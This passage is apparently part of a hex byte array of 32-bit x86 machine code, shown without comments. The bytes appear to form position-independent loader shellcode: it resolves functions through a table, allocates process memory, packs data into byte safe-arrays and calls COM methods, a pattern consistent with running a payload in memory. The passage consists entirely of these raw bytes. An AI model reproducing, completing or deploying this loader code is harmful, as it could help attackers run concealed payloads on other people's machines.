483 0x24, 0x0c, 0x8d, 0x55, 0xa0, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
484 0x04, 0x05, 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff,
485 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f,
486 0x85, 0x2d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x7c, 0xff,
487 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00, 0x0f, 0x85, 0x91, 0x01, 0x00, 0x00,
488 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
489 0xc0, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
490 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xa4, 0x89,
491 0x54, 0x24, 0x04, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
492 0xec, 0x10, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f, 0x84, 0x52,
493 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa4, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x01,
494 0x00, 0x00, 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x3f, 0x8b, 0x45, 0x08, 0x8b,
495 0x58, 0x6c, 0x8b, 0x45, 0xa4, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b,
496 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff,
497 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00,
498 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xe4,
499 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x4f, 0xe9, 0x02, 0x01, 0x00, 0x00, 0x8b,
500 0x45, 0x08, 0x8b, 0x58, 0x70, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01,
501 0xd0, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40,
502 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24,
503 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
504 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x10,
505 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xb7, 0x00, 0x00,
506 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x55,
507 0xa4, 0x8b, 0x5d, 0xa0, 0x8b, 0x4d, 0xe4, 0x01, 0xcb, 0x8d, 0x4d, 0x98,
508 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
509 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
510 0x45, 0xbc, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45,
511 0xa0, 0xe9, 0xed, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x74,
512 0x70, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x6c, 0x8b, 0x45, 0xa0, 0x89, 0x85,
513 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0,
514 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
515 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83,
516 0xec, 0x0c, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x36, 0xc7,
517 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8,
518 0x00, 0x00, 0x00, 0x8b, 0x55, 0xa0, 0x8d, 0x4d, 0x98, 0x89, 0x4c, 0x24,
519 0x0c, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x04,
520 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
521 0x45, 0xe0, 0xeb, 0x01, 0x90, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xcd,
522 0x00, 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x0f, 0x84, 0xc2, 0x00,
523 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x85, 0xc8, 0xfc, 0xff, 0xff, 0x8b,
524 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x89,
525 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7,
526 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85, 0xc8, 0xfc, 0xff,
527 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00,
528 0x00, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
529 0xe8, 0xdf, 0x41, 0x00, 0x00, 0x89, 0x45, 0xb8, 0x83, 0x7d, 0xb8, 0x00,
530 0x78, 0x28, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
531 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24,
532 0x04, 0x89, 0x04, 0x24, 0xe8, 0x79, 0x3b, 0x00, 0x00, 0xc7, 0x45, 0xe0,
533 0x01, 0x00, 0x00, 0x00, 0xeb, 0x07, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00,
534 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
535 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x89, 0x04, 0x24, 0xe8, 0x21,
536 0x3b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x78, 0x8b, 0x45, 0x08,
537 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08,
538 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff,
539 0xd3, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00,
540 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
541 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8,
542 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b,
543 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff,
544 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xac, 0x00,
545 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83,
546 0xf8, 0x03, 0x0f, 0x85, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
547 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x08, 0x8b,
548 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x89,
549 0xc3, 0x8b, 0x45, 0x08, 0x8d, 0x88, 0x18, 0x0d, 0x00, 0x00, 0x8b, 0x45,
550 0x08, 0x8d, 0x90, 0x08, 0x0d, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x0c, 0x8b,
551 0x45, 0xb4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
552 0x24, 0xe8, 0x48, 0x45, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c,
553 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c, 0x00, 0x00,
554 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c, 0x24, 0xe8,
555 0x12, 0x42, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x89, 0x55, 0xac, 0x8b, 0x45,
556 0xb4, 0x8b, 0x90, 0x1c, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x18, 0x05, 0x00,
557 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xa8, 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45,
558 0xac, 0x89, 0xc7, 0x89, 0xf8, 0x09, 0xf0, 0x85, 0xc0, 0x74, 0x07, 0xb8,
559 0x00, 0x00, 0x00, 0x00, 0xeb, 0x03, 0x8b, 0x45, 0xe0, 0x8d, 0x65, 0xf4,
560 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec,
561 0x50, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
562 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd4,
563 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x22, 0x01, 0x00, 0x00, 0x8b,
564 0x45, 0x08, 0x8b, 0x80, 0xd4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b,
565 0x4d, 0x08, 0x8d, 0x99, 0x34, 0x08, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x81,
566 0xc1, 0x24, 0x08, 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24,
567 0x04, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4,
568 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0xde, 0x00, 0x00, 0x00, 0x8b, 0x45,
569 0x0c, 0x8d, 0x50, 0x0c, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44,
570 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
571 0xe8, 0x6a, 0xef, 0xff, 0xff, 0x8b, 0x45, 0x10, 0x8b, 0x00, 0x8b, 0x00,
572 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x04, 0x8b, 0x55, 0x08,
573 0x8d, 0x8a, 0x44, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x12, 0x89,
574 0x5c, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8d, 0x8d, 0xd4, 0xfd, 0xff,
575 0xff, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
576 0x10, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x72, 0x8b, 0x45,
577 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10,
578 0x8b, 0x52, 0x04, 0x8d, 0x4d, 0xd4, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
579 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
580 0x00, 0x78, 0x5e, 0x8b, 0x45, 0xd4, 0x85, 0xc0, 0x74, 0x57, 0x8b, 0x45,
581 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x24, 0x8b, 0x55, 0x10,
582 0x8d, 0x72, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x9a, 0x64, 0x08, 0x00, 0x00,
583 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x54, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10,
584 0x8b, 0x52, 0x04, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x08, 0x89,
585 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
586 0x45, 0xf4, 0xeb, 0x15, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x04, 0x00, 0x00,
587 0x00, 0x00, 0xeb, 0x09, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
588 0x00, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x0d, 0x8b, 0x45, 0x08, 0x8b, 0x80,
589 0xd4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x44, 0x8b, 0x45, 0x08, 0x8b,
590 0x80, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x08, 0x8b,
591 0x55, 0x08, 0x8d, 0x8a, 0x64, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81,
592 0xc2, 0x54, 0x08, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x4c, 0x24,
593 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
594 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec,
595 0x14, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79, 0x14, 0x8b, 0x45,
596 0x10, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
597 0x00, 0xe9, 0x4e, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08,
598 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89,
599 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x83, 0x7d,
600 0xf4, 0x00, 0x0f, 0x88, 0x25, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f,
601 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x2b, 0x8b, 0x45,
602 0x10, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x10,
603 0x8d, 0x4a, 0x0c, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24,
604 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4,
605 0xe9, 0x85, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x01,
606 0x00, 0x00, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08,
607 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xb0,
608 0xed, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00,
609 0x8d, 0x95, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
610 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x8b,
611 0x00, 0x8b, 0x40, 0x30, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x0c, 0x8b, 0x55,
612 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
613 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04, 0x89,
614 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0x8b, 0x45,
615 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89, 0x14,
616 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
617 0x5d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x0c, 0x8b, 0x00,
618 0x8b, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x10, 0x8b, 0x55, 0x08, 0x8d,
619 0x8a, 0x74, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x0c, 0x89,
620 0x5c, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0,
621 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
622 0x21, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0x8b,
623 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x45, 0xd8, 0x8b,
624 0x45, 0x08, 0x8b, 0x80, 0x84, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xd8, 0x89,
625 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0xc7,
626 0x04, 0x24, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
627 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xdd, 0x00, 0x00, 0x00,
628 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40,
629 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x1e, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0,
630 0x01, 0xc2, 0x8b, 0x4d, 0x0c, 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28,
631 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01,
632 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0,
633 0x72, 0xd4, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b, 0x80,
634 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x14, 0x8b, 0x55,
635 0x10, 0x8b, 0x52, 0x10, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xe4, 0x89,
636 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
637 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0,
638 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
639 0xe4, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x2e, 0x8b, 0x55, 0x0c,
640 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x05, 0x28, 0x05, 0x00, 0x00, 0xc6, 0x00,
641 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0, 0x01, 0xc2, 0x8b, 0x4d, 0x0c,
642 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28, 0x05, 0x00, 0x00, 0x0f, 0xb6,
643 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x45, 0x0c, 0x8b, 0x80,
644 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0, 0x72, 0xc4, 0x8b, 0x45, 0x08,
645 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24,
646 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xec, 0x8d, 0x65, 0xf8, 0x5b,
647 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0xc4, 0x02, 0x00,
648 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00,
649 0x00, 0x00, 0x00, 0xc7, 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
650 0x9c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00,
651 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x45, 0x82, 0x00,
652 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x0c,
653 0x03, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b,
654 0x40, 0x40, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x1c, 0x8b, 0x55, 0x10, 0x8b,
655 0x52, 0x14, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
656 0xec, 0x08, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xcd,
657 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b,
658 0x40, 0x48, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c, 0x8d, 0x4d, 0xdc, 0x89,
659 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89,
660 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x47, 0x05, 0x00, 0x00,
661 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc,
662 0x8d, 0x8d, 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
663 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
664 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x98, 0x00,
665 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x8d, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x89,
666 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89,
667 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x85,
668 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x78, 0xff, 0xff, 0xff, 0x29, 0xd0,
669 0x83, 0xc0, 0x01, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84,
670 0xa3, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00,
671 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
672 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00,
673 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x0f,
674 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xd8, 0x00,
675 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d,
676 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24,
677 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x6b, 0xea, 0xff, 0xff,
678 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70,
679 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff,
680 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4,
681 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88,
682 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
683 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
684 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
685 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x4a, 0x8b, 0x45, 0x08,
686 0x8b, 0x98, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c,
687 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84, 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00,
688 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff,
689 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d,
690 0x45, 0x84, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83,
691 0xec, 0x0c, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89, 0x45, 0x84, 0x8b,
692 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39, 0xd0, 0x72, 0xa9,
693 0xeb, 0x68, 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b,
694 0x80, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00,
695 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
696 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
697 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x98,
698 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00,
699 0x00, 0x8d, 0x55, 0x82, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
700 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0x84, 0x89, 0x44,
701 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0xc7, 0x45,
702 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x8c, 0x00,
703 0x00, 0x00, 0x8d, 0x55, 0xa8, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0x84,
704 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
705 0x83, 0xec, 0x0c, 0x66, 0xc7, 0x45, 0x98, 0x01, 0x00, 0xc7, 0x45, 0xa0,
706 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00,
707 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c,
708 0x8d, 0x4d, 0x88, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xf4, 0x89, 0x4c,
709 0x24, 0x14, 0x8b, 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x04, 0x8b, 0x4d, 0x9c,
